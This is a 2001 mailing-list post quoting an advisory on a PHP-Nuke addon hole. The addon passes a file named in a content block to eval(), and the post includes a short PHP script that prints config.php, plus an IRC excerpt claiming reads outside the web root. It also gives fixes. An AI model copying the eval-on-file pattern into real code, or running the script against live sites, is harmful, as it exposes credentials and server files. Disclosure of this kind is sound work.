Re: SERIOUS BUG IN PHPNUKE

From: supergateat_private
Date: Fri Jul 27 2001 - 14:33:32 PDT

    i dont find it a serious bug... they can just ruin their details page... so
    who cares...however if u want a serious bug of php nuke... well there is one
    that allows to read any file on the sytem look at:

    http://www.twlc.net/article.php?sid=318

    Mauro.
    admin of twlc dot net

          bug in nuke addon@#! DANGEROUS++!!!
          Posted on Friday, July 13 @ 19:53:31 CDT
          topic: advisories
          Evening everyone..
          Sorry to tell you: php nuke addon is BUGGY. it got a *HUGE* bug that
    allows reading of every file on the system. let me explain you the bug...

          To do active forums and shit like that the author had to put:

          echo "<tr valign="top"><td bgcolor="#ffffff"> ";
          if (file_exists($content)) {
          $fp = fopen ($content, "r");
          $content = fread($fp, filesize($content));
          fclose ($fp);
          $content = "?>$content<?";
          echo eval($content);
          } else {
          echo $content;
          }

          replacing

          ."<tr valign="top"><td bgcolor="#ffffff"> "
          ."$content "

          ON EACH THEME file... so what this code does? it check the content of
    the block and if this is a file it 'executes' it ... now i was like 'and if
    i put something like this'

          <?php
          $db = "config.php";
          $fdb = @file($db);
          $ldb = count($fdb);
          while ($ldb>=0){
          echo $fdb [$ldb];
          $ldb--;
          };
          ?>
          (sorry for the code, but i am not a php guru:P)
          and name it to exploit.php and put it in the main directory? it simply
    allowed me to read config.php but a friend of mine (shockzor THANK YOU BRO)
    told me "who could put a file like that on ur webserver" (i didnt made the
    test to upload it on my anonymous ftp but i think it could work:)) but thats
    just a possibility that this routine gives to you cus i went ahead doing
    these tests and and i found that this SIMPLY ALLOWS ANY FILE READING ON THE
    SYSTEM LOOK:

          (sg|code) u got autoexec.bat under c: ?
          (shockzor) no
          (shockzor) autoexec.nt
          (sg|code) good
          (sg|code) Menu for shit
          <sg|code>
          (sg|code) lh %SystemRoot%system32mscdexnt.exe lh %SystemRoot%system32
    edir lh %SystemRoot%system32dosx
          (sg|code) now
          (sg|code) since i am
          (sg|code) 31337
          (sg|code) WHAT?
          (sg|code) EHEH
          (shockzor) i dont think you can get out of the www root
          (sg|code) u think wrong
          (sg|code) cus i just did

          well u got to fixes:

          1) bring back your themes file to:

          ."<tr valign="top"><td bgcolor="#ffffff"> "
          ."$content "

          2) get user.php go at the end of the file where there is:
          switch($op) {

          look down since you find

          case "edithome":
          edithome();
          break;

          case "savehome":
          savehome($uid, $uname, $theme, $storynum, $ublockon, $ublock);
          break;

          remove this shit so users cant create their "home menu"

          thanks for the attention.

          btw i would like to thank shockzor that helped me making the tests!
    thanks bro..!:D thanks also goes out to all in #twlc on undernet

          peace out

          (thanks goes out also to the authors of php nuke and php nuke addon, i
    run em and i like em a lot ! keep up the good work)

          Mauro
          aka supergate
          rootat_private
          http://www.twlc.net